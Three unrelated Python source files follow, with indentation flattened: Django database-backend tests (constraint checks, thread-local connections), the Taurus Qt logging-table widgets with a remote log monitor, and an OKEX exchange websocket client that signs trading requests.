tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
cursor.executemany(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i**2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i**2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i**2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i**2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), (u'Clark', u'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [(u'Jane', u'Doe'), (u'John', u'Doe')])
self.assertEqual(list(cursor.fetchall()), [(u'Mary', u'Agnelline'), (u'Peter', u'Parker')])
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# Instead, the tests below trigger the violation and verify that the error
# raised is of type django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
        # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
            # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
            # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
            # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
finally:
transaction.rollback()
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
connections_set = set()
connection.cursor()
connections_set.add(connection.connection)
def runner():
from django.db import connection
connection.cursor()
connections_set.add(connection.connection)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
        self.assertEqual(len(connections_set), 3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection.connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
connections_set = set()
for conn in connections.all():
connections_set.add(conn)
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_set.add(conn)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
        self.assertEqual(len(connections_set), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except DatabaseError, e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(len(exceptions), 0)
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError, e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError, e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class BackendLoadingTests(TestCase):
def test_old_style_backends_raise_useful_exception(self):
self.assertRaisesRegexp(ImproperlyConfigured,
"Try using django.db.backends.sqlite3 instead",
load_backend, 'sqlite3')
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for automatic primary key.
"""
@skipIfDBFeature('allows_primary_key_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
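# Sketch (illustrative, not from Django) of the opt-in rule the ThreadTests
# above exercise: a connection may only be used or closed from another thread
# after allow_thread_sharing has been enabled on it.
def _share_default_connection_with(worker):
    conn = connections['default']
    conn.allow_thread_sharing = True  # opt in before handing the connection over
    t = threading.Thread(target=worker, args=[conn])
    t.start()
    t.join()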
|
qlogtable.py
|
#!/usr/bin/env python
#############################################################################
##
# This file is part of Taurus
##
# http://taurus-scada.org
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Taurus is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Taurus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Taurus. If not, see <http://www.gnu.org/licenses/>.
##
#############################################################################
"""This module provides Qt table widgets which display logging messages from the
python :mod:`logging` module"""
from __future__ import absolute_import
from operator import attrgetter
from builtins import range
import logging
import logging.handlers
import datetime
import threading
import socket
import click
import taurus
from taurus.core.util.log import Logger
from taurus.core.util.remotelogmonitor import LogRecordStreamHandler, \
LogRecordSocketReceiver
from taurus.core.util.decorator.memoize import memoized
from taurus.external.qt import Qt
from taurus.qt.qtgui.model import FilterToolBar
from taurus.qt.qtgui.util import ActionFactory
import taurus.cli.common
from .qtable import QBaseTableWidget
__all__ = ["QLoggingTableModel", "QLoggingTable", "QLoggingWidget",
"QRemoteLoggingTableModel"]
__docformat__ = 'restructuredtext'
LEVEL, TIME, MSG, NAME, ORIGIN = list(range(5))
HORIZ_HEADER = 'Level', 'Time', 'Message', 'By', 'Origin'
__LEVEL_BRUSH = {
taurus.Trace: (Qt.Qt.lightGray, Qt.Qt.black),
taurus.Debug: (Qt.Qt.green, Qt.Qt.black),
taurus.Info: (Qt.Qt.blue, Qt.Qt.white),
taurus.Warning: (Qt.QColor(255, 165, 0), Qt.Qt.black),
taurus.Error: (Qt.Qt.red, Qt.Qt.black),
taurus.Critical: (Qt.QColor(160, 32, 240), Qt.Qt.white),
}
def getBrushForLevel(level):
elevel = taurus.Trace
if level <= taurus.Trace:
elevel = taurus.Trace
elif level <= taurus.Debug:
elevel = taurus.Debug
elif level <= taurus.Info:
elevel = taurus.Info
elif level <= taurus.Warning:
elevel = taurus.Warning
elif level <= taurus.Error:
elevel = taurus.Error
elif level <= taurus.Critical:
elevel = taurus.Critical
f, g = list(map(Qt.QBrush, __LEVEL_BRUSH[elevel]))
return f, g
gethostname = memoized(socket.gethostname)
def _get_record_origin(rec):
host = getattr(rec, 'hostName', "?" + gethostname() + "?")
procName = getattr(rec, 'processName', "?process?")
procID = getattr(rec, 'process', "?PID?")
threadName = getattr(rec, 'threadName', "?thread?")
threadID = getattr(rec, 'thread', "?threadID?")
return host, procName, procID, threadName, threadID
def _get_record_trace(rec):
pathname = getattr(rec, 'pathname', '')
filename = getattr(rec, 'filename', '')
modulename = getattr(rec, 'module', '')
funcname = getattr(rec, 'funcName', '')
lineno = getattr(rec, 'lineno', '')
return pathname, filename, modulename, funcname, lineno
def _get_record_origin_str(rec):
return "{0}.{1}.{3}".format(*_get_record_origin(rec))
def _get_record_origin_tooltip(rec):
host, procName, procID, threadName, threadID = _get_record_origin(rec)
pathname, filename, modulename, funcname, lineno = _get_record_trace(rec)
timestamp = str(datetime.datetime.fromtimestamp(rec.created))
bgcolor, fgcolor = list(map(Qt.QBrush.color, getBrushForLevel(rec.levelno)))
bgcolor = "#%02x%02x%02x" % (
bgcolor.red(), bgcolor.green(), bgcolor.blue())
fgcolor = "#%02x%02x%02x" % (
fgcolor.red(), fgcolor.green(), fgcolor.blue())
return """<html><font face="monospace" size="1">
<table border="0" cellpadding="0" cellspacing="0">
<tr><td>Level:</td><td><font color="{level_bgcolor}">{level}</font></td></tr>
<tr><td>Time:</td><td>{timestamp}</td></tr>
<tr><td>Message:</td><td>{message}</td></tr>
<tr><td>By:</td><td>{name}</td></tr>
<tr><td>Host:</td><td>{host}</td></tr>
<tr><td>Process:</td><td>{procname}({procID})</td></tr>
<tr><td>Thread:</td><td>{threadname}({threadID})</td></tr>
<tr><td>From:</td><td>File {pathname}({filename}), line {lineno}, in {funcname}</td></tr>
</table></font></html>
""".format(level=rec.levelname, level_fgcolor=fgcolor, level_bgcolor=bgcolor,
timestamp=timestamp, message=rec.getMessage(),
name=rec.name, host=host, procname=procName, procID=procID,
threadname=threadName, threadID=threadID,
pathname=pathname, filename=filename, funcname=funcname,
lineno=lineno)
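# The origin helpers above read optional attributes (hostName, processName,
# process, threadName, thread) off each LogRecord with getattr() fallbacks.
# A small illustrative helper (not part of Taurus) showing how a sender could
# stamp the hostName attribute those fallbacks look for:
def _stamp_host_name(record):
    if not hasattr(record, 'hostName'):
        record.hostName = gethostname()
    return record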
class QLoggingTableModel(Qt.QAbstractTableModel, logging.Handler):
DftFont = Qt.QFont("Mono", 8)
DftColSize = Qt.QSize(80, 20), Qt.QSize(200, 20), \
Qt.QSize(300, 20), Qt.QSize(180, 20), Qt.QSize(240, 20),
def __init__(self, parent=None, capacity=500000, freq=0.25):
super(Qt.QAbstractTableModel, self).__init__()
logging.Handler.__init__(self)
self._capacity = capacity
self._records = []
self._accumulated_records = []
Logger.addRootLogHandler(self)
self.startTimer(freq * 1000)
# ---------------------------------
# Qt.QAbstractTableModel overwrite
# ---------------------------------
def sort(self, column, order=Qt.Qt.AscendingOrder):
column2key_map = {LEVEL: attrgetter('levelno'),
TIME: attrgetter('created'),
MSG: attrgetter('msg'),
NAME: attrgetter('name'),
ORIGIN: attrgetter('process', 'thread', 'name'),
}
self._records = sorted(self._records, key=column2key_map[column],
reverse=order == Qt.Qt.DescendingOrder)
def rowCount(self, index=Qt.QModelIndex()):
return len(self._records)
def columnCount(self, index=Qt.QModelIndex()):
return len(HORIZ_HEADER)
def getRecord(self, index):
return self._records[index.row()]
def data(self, index, role=Qt.Qt.DisplayRole):
if not index.isValid() or not (0 <= index.row() < len(self._records)):
return None
record = self.getRecord(index)
column = index.column()
if role == Qt.Qt.DisplayRole:
if column == LEVEL:
return record.levelname
elif column == TIME:
dt = datetime.datetime.fromtimestamp(record.created)
return str(dt)
                # return dt.strftime("%Y-%m-%d %H:%M:%S.%f")
elif column == MSG:
return record.getMessage()
elif column == NAME:
return record.name
elif column == ORIGIN:
return _get_record_origin_str(record)
elif role == Qt.Qt.TextAlignmentRole:
if column in (LEVEL, MSG):
return Qt.Qt.AlignLeft | Qt.Qt.AlignVCenter
return Qt.Qt.AlignRight | Qt.Qt.AlignVCenter
elif role == Qt.Qt.BackgroundRole:
if column == LEVEL:
return getBrushForLevel(record.levelno)[0]
elif role == Qt.Qt.ForegroundRole:
if column == LEVEL:
return getBrushForLevel(record.levelno)[1]
elif role == Qt.Qt.ToolTipRole:
return _get_record_origin_tooltip(record)
elif role == Qt.Qt.SizeHintRole:
return self._getSizeHint(column)
# elif role == Qt.Qt.StatusTipRole:
# elif role == Qt.Qt.CheckStateRole:
elif role == Qt.Qt.FontRole:
return self.DftFont
return None
def _getSizeHint(self, column):
return QLoggingTableModel.DftColSize[column]
def headerData(self, section, orientation, role=Qt.Qt.DisplayRole):
if role == Qt.Qt.TextAlignmentRole:
if orientation == Qt.Qt.Horizontal:
return int(Qt.Qt.AlignLeft | Qt.Qt.AlignVCenter)
return int(Qt.Qt.AlignRight | Qt.Qt.AlignVCenter)
elif role == Qt.Qt.SizeHintRole:
if orientation == Qt.Qt.Vertical:
return Qt.QSize(50, 20)
else:
return self._getSizeHint(section)
elif role == Qt.Qt.FontRole:
return Qt.QFont("Mono", 8)
elif role == Qt.Qt.ToolTipRole:
if section == LEVEL:
return "log level"
elif section == TIME:
return "log time stamp"
elif section == MSG:
return "log message"
elif section == NAME:
return "object who recorded the log"
elif section == ORIGIN:
return ("the host, process and thread where the"
+ " log was executed from")
if role != Qt.Qt.DisplayRole:
return None
if orientation == Qt.Qt.Horizontal:
return HORIZ_HEADER[section]
return int(section + 1)
def insertRows(self, position, rows=1, index=Qt.QModelIndex()):
self.beginInsertRows(Qt.QModelIndex(), position, position + rows - 1)
self.endInsertRows()
def removeRows(self, position, rows=1, index=Qt.QModelIndex()):
self.beginRemoveRows(Qt.QModelIndex(), position, position + rows - 1)
self.endRemoveRows()
# def setData(self, index, value, role=Qt.Qt.DisplayRole):
# pass
# def flags(self, index)
# pass
# def insertColumns(self):
# pass
# def removeColumns(self):
# pass
# --------------------------
# logging.Handler overwrite
# --------------------------
def timerEvent(self, evt):
self.updatePendingRecords()
def updatePendingRecords(self):
if not self._accumulated_records:
return
row_nb = self.rowCount()
records = self._accumulated_records
self._accumulated_records = []
self._records.extend(records)
self.insertRows(row_nb, len(records))
if len(self._records) > self._capacity:
start = len(self._records) - self._capacity
self._records = self._records[start:]
self.removeRows(0, start)
def emit(self, record):
self._accumulated_records.append(record)
def flush(self):
pass
def close(self):
self.flush()
del self._records[:]
logging.Handler.close(self)
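# Records reach the model above in two stages: logging.Handler.emit() only
# buffers them in _accumulated_records, and the timer started in __init__
# periodically moves the buffer into _records (trimmed to `capacity`) via
# updatePendingRecords(). An illustrative helper (not part of Taurus) to
# force that flush synchronously, e.g. from a test:
def _flush_pending_records(model):
    model.updatePendingRecords()
    return model.rowCount()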
class _LogRecordStreamHandler(LogRecordStreamHandler):
def handleLogRecord(self, record):
self.server.data.get('model').emit(record)
class QRemoteLoggingTableModel(QLoggingTableModel):
"""A remote Qt table that displays the taurus logging messages"""
def connect_logging(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=_LogRecordStreamHandler):
self.log_receiver = LogRecordSocketReceiver(host=host, port=port,
handler=handler, model=self)
self.log_thread = threading.Thread(
target=self.log_receiver.serve_until_stopped)
self.log_thread.daemon = False
self.log_thread.start()
def disconnect_logging(self):
if not hasattr(self, 'log_receiver') or self.log_receiver is None:
return
self.log_receiver.stop()
self.log_thread.join()
del self.log_receiver
class QLoggingTable(Qt.QTableView):
"""A Qt table that displays the taurus logging messages"""
scrollLock = False
def rowsInserted(self, index, start, end):
"""Overwrite of slot rows inserted to do proper resize and scroll to
bottom if desired"""
Qt.QTableView.rowsInserted(self, index, start, end)
for i in range(start, end + 1):
self.resizeRowToContents(i)
if start == 0:
self.resizeColumnsToContents()
if not self.scrollLock:
self.scrollToBottom()
def setScrollLock(self, scrollLock):
"""Sets the state for scrollLock"""
self.scrollLock = scrollLock
def getScrollLock(self):
"""Returns wheater or not the scrollLock is active"""
return self.scrollLock
def resetScrollLock(self):
        self.setScrollLock(QLoggingTable.scrollLock)
class LoggingToolBar(FilterToolBar):
scrollLockToggled = Qt.pyqtSignal(bool)
def __init__(self, view=None, parent=None, designMode=False):
FilterToolBar.__init__(self, view=view, parent=parent,
designMode=designMode)
self.getFilterLineEdit().setToolTip("Quick filter by log name")
self._logLevelComboBox = logLevelComboBox = Qt.QComboBox()
levels = "Trace", "Debug", "Info", "Warning", "Error", "Critical"
for level in levels:
logLevelComboBox.addItem(level, getattr(taurus, level))
logLevelComboBox.setCurrentIndex(0)
logLevelComboBox.currentIndexChanged.connect(self.onLogLevelChanged)
logLevelComboBox.setToolTip("Filter by log level")
self._filterLevelAction = self.addWidget(logLevelComboBox)
self.addSeparator()
af = ActionFactory()
self._scrollLockAction = af.createAction(self, "Refresh",
icon=Qt.QIcon.fromTheme(
"system-lock-screen"),
tip="Scroll lock",
toggled=self.onToggleScrollLock)
self.addAction(self._scrollLockAction)
def onToggleScrollLock(self, yesno):
self.scrollLockToggled.emit(yesno)
def onLogLevelChanged(self, index):
self.onFilterChanged()
def getLogLevelComboBox(self):
return self._logLevelComboBox
def getLogLevel(self):
combo = self.getLogLevelComboBox()
return combo.itemData(combo.currentIndex())
def setLogLevel(self, level):
combo = self.getLogLevelComboBox()
for i in range(combo.count()):
l = combo.itemData(i)
if l == level:
combo.setCurrentIndex(i)
class QLoggingFilterProxyModel(Qt.QSortFilterProxyModel):
"""A filter by log record object name"""
def __init__(self, parent=None):
Qt.QSortFilterProxyModel.__init__(self, parent)
self._logLevel = taurus.Trace
# filter configuration
self.setFilterCaseSensitivity(Qt.Qt.CaseInsensitive)
self.setFilterKeyColumn(0)
self.setFilterRole(Qt.Qt.DisplayRole)
# sort configuration
# self.setSortCaseSensitivity(Qt.Qt.CaseInsensitive)
# self.setSortRole(Qt.Qt.DisplayRole)
# general configuration
def setFilterLogLevel(self, level):
self._logLevel = level
def __getattr__(self, name):
return getattr(self.sourceModel(), name)
def filterAcceptsRow(self, sourceRow, sourceParent):
sourceModel = self.sourceModel()
idx = sourceModel.index(sourceRow, NAME, sourceParent)
record = self.getRecord(idx)
if record.levelno < self._logLevel:
return False
name = str(sourceModel.data(idx))
regexp = self.filterRegExp()
if regexp.indexIn(name) != -1:
return True
return False
_W = "Warning: Switching log perspective will erase previous log messages " \
"from current perspective!"
class QLoggingWidget(QBaseTableWidget):
KnownPerspectives = {
'Standard': {
"label": "Local",
"icon": "computer",
"tooltip": "Local logging.\n" + _W,
"model": [QLoggingFilterProxyModel, QLoggingTableModel, ],
},
'Remote': {
"label": "Remote",
"icon": "network-server",
"tooltip": "Monitor remote logs.\n" + _W,
"model": [QLoggingFilterProxyModel, QRemoteLoggingTableModel, ],
},
}
DftPerspective = 'Standard'
def __init__(self, parent=None, designMode=False,
with_filter_widget=LoggingToolBar,
with_selection_widget=True, with_refresh_widget=True,
perspective=None, proxy=None):
QBaseTableWidget.__init__(self, parent=parent, designMode=designMode,
with_filter_widget=with_filter_widget,
with_selection_widget=False, with_refresh_widget=False,
perspective=perspective, proxy=proxy)
def createViewWidget(self, klass=None):
if klass is None:
klass = QLoggingTable
view = QBaseTableWidget.createViewWidget(self, klass=klass)
hh = view.horizontalHeader()
if hh.length() > 0:
try:
hh.setSectionResizeMode(MSG, Qt.QHeaderView.Stretch)
except AttributeError: # PyQt4
hh.setResizeMode(MSG, Qt.QHeaderView.Stretch)
view.setShowGrid(False)
view.sortByColumn(TIME, Qt.Qt.AscendingOrder)
return view
def createToolArea(self):
tb = QBaseTableWidget.createToolArea(self)
filterBar = self.getFilterBar()
filterBar.scrollLockToggled.connect(self.onScrollLockToggled)
return tb
def onScrollLockToggled(self, yesno):
self.viewWidget().setScrollLock(yesno)
def onFilterChanged(self, filter):
if not self.usesProxyQModel():
return
proxy_model = self.getQModel()
level = self.getFilterBar().getLogLevel()
proxy_model.setFilterLogLevel(level)
return QBaseTableWidget.onFilterChanged(self, filter)
def onSwitchPerspective(self, perspective):
self.stop_logging()
if perspective == "Remote":
if hasattr(self, 'hostName') and hasattr(self, 'port'):
host, port = self.hostName, self.port
else:
isValid = False
dft = "%s:%d" % (socket.gethostname(),
logging.handlers.DEFAULT_TCP_LOGGING_PORT)
while not isValid:
txt, res = Qt.QInputDialog.getText(self,
"Please input remote logging host and port",
"Location (<host>:<port>):", Qt.QLineEdit.Normal, dft)
if not res:
return
try:
host, port = str(txt).split(":", 1)
port = int(port)
isValid = True
                    except ValueError:
Qt.QMessageBox.information(self, "Invalid name",
"Please type a valid <host>:<port>")
ret = QBaseTableWidget.onSwitchPerspective(self, perspective)
qmodel = self.getQModel()
qmodel.connect_logging(host=host, port=port)
else:
ret = QBaseTableWidget.onSwitchPerspective(self, perspective)
return ret
def destroy(self, destroyWindow=True, destroySubWindows=True):
self.stop_logging()
return QBaseTableWidget.destroy(self, destroyWindow, destroySubWindows)
def stop_logging(self):
model = self.getBaseQModel()
if hasattr(model, 'disconnect_logging'):
model.disconnect_logging()
@classmethod
def getQtDesignerPluginInfo(cls):
return {
'module': 'taurus.qt.qtgui.table',
'group': 'Taurus Views',
'icon': 'designer:table.png',
'container': False}
def fill_log():
import time
import random
for i in range(10):
taurus.info("Hello world %04d" % i)
loggers = ["Object%02d" % (i + 1) for i in range(10)]
i = 0
while True:
time.sleep(random.random())
logger = logging.getLogger(random.choice(loggers))
level = random.randint(taurus.Trace, taurus.Critical)
logger.log(level, "log message %04d" % i)
i += 1
def main():
import taurus.qt.qtgui.application
Application = taurus.qt.qtgui.application.TaurusApplication
app = Application.instance()
owns_app = app is None
if owns_app:
app = Application(app_name="Logging demo", app_version="1.0",
org_domain="Taurus", org_name="Taurus community")
taurus.setLogLevel(taurus.Trace)
taurus.disableLogOutput()
w = QLoggingWidget()
taurus.trace("trace message")
taurus.debug("debug message")
taurus.info("Hello world")
taurus.warning("Warning message")
taurus.error("error message")
taurus.critical("critical message")
w.setMinimumSize(1200, 600)
w.show()
app.exec_()
w.stop_logging()
@click.command('qlogmon')
@click.option(
'--port', 'port', type=int,
default=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
show_default=True,
help='Port where log server is running',
)
@click.option(
'--log-name', 'log_name',
default=None,
help='Filter specific log object',
)
@taurus.cli.common.log_level
def qlogmon_cmd(port, log_name, log_level):
"""Show the Taurus Remote Log Monitor"""
import taurus
host = socket.gethostname()
level = getattr(taurus, log_level.capitalize(), taurus.Trace)
from taurus.qt.qtgui.application import TaurusApplication
app = TaurusApplication(cmd_line_parser=None,
app_name="Taurus remote logger")
w = QLoggingWidget(perspective="Remote")
w.setMinimumSize(1024, 600)
filterbar = w.getFilterBar()
filterbar.setLogLevel(level)
if log_name is not None:
filterbar.setFilterText(log_name)
w.getPerspectiveBar().setEnabled(False)
w.getQModel().connect_logging(host, port)
w.show()
app.exec_()
w.getQModel().disconnect_logging()
if __name__ == '__main__':
main()
# qlogmon_cmd
|
vnokex.py
|
# encoding: UTF-8
import hashlib
import zlib
import json
from time import sleep
from threading import Thread
import websocket
from HttpMD5Util import buildMySign, httpGet, httpPost
# OKEX websocket endpoints
OKEX_USD_SPOT = 'wss://real.okex.com:10441/websocket' # OKEX spot address
#OKEX_USD_SPOT = 'wss://47.90.109.236:10441/websocket' # OKEX spot address
#OKEX_USD_SPOT = 'wss://ws.blockchain.info/inv' # OKEX spot address
OKEX_USD_CONTRACT = 'wss://real.okex.com:10440/websocket/okexapi' # OKEX futures address
OKEX_usd_CONTRACT_REST = "www.okex.com"
SPOT_CURRENCY = ["usdt",
"btc",
"ltc",
"eth",
"etc",
"bch"]
SPOT_SYMBOL = ["ltc_btc",
"eth_btc",
"etc_btc",
"bch_btc",
"btc_usdt",
"eth_usdt",
"ltc_usdt",
"etc_usdt",
"bch_usdt",
"etc_eth",
"bt1_btc",
"bt2_btc",
"btg_btc",
"qtum_btc",
"hsr_btc",
"neo_btc",
"gas_btc",
"qtum_usdt",
"hsr_usdt",
"neo_usdt",
"gas_usdt"]
KLINE_PERIOD = ["1min",
"3min",
"5min",
"15min",
"30min",
"1hour",
"2hour",
"4hour",
"6hour",
"12hour",
"day",
"3day",
"week"]
CONTRACT_SYMBOL = ["btc",
"ltc",
"eth",
"etc",
"bch"]
CONTRACT_TYPE = ["this_week",
"next_week",
"quarter"]
########################################################################
class OkexApi(object):
"""交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
        self.host = ''          # server address
        self.apiKey = ''        # username (API key)
        self.secretKey = ''     # password (secret key)
        self.ws = None          # websocket application object (spot)
        self.thread = None      # worker thread running the websocket loop
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
# 首先关闭之前的连接
self.close()
# 再执行重连任务
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
        self.thread = Thread(target=self.ws.run_forever,
                             kwargs={'ping_interval': 25})  # keep-alive ping every 25 s
self.thread.start()
#----------------------------------------------------------------------
def connect(self, apiKey, secretKey, trace=False):
self.host = OKEX_USD_SPOT
self.apiKey = apiKey
self.secretKey = secretKey
websocket.enableTrace(trace)
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
        self.thread = Thread(target=self.ws.run_forever,
                             kwargs={'ping_interval': 25})  # keep-alive ping every 25 s
self.thread.start()
#----------------------------------------------------------------------
def readData(self, evt):
"""解码推送收到的数据"""
data = json.loads(evt)
return data
#----------------------------------------------------------------------
def close(self):
"""关闭接口"""
if self.thread and self.thread.isAlive():
self.ws.close()
self.thread.join()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
print evt
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
print 'onError'
print evt
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
print 'onClose'
#----------------------------------------------------------------------
def onOpen(self, ws):
"""接口打开"""
print 'onOpen'
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
#----------------------------------------------------------------------
    def sendTradingRequest(self, channel, params):
        """Send a trading request"""
        # add the api_key and signature fields to the parameter dict
        try:
            params['api_key'] = self.apiKey
            params['sign'] = self.generateSign(params)
            # build the request
            d = {}
            d['event'] = 'addChannel'
            d['channel'] = channel
            d['parameters'] = params
            # pack with json before sending
            j = json.dumps(d)
            print d
        except Exception, e:
            # raise
            print e
            # bail out here: j is undefined if building the request failed
            return
        # if the connection has been closed, drop the message silently
        try:
            self.ws.send(j)
        except websocket.WebSocketConnectionClosedException:
            pass
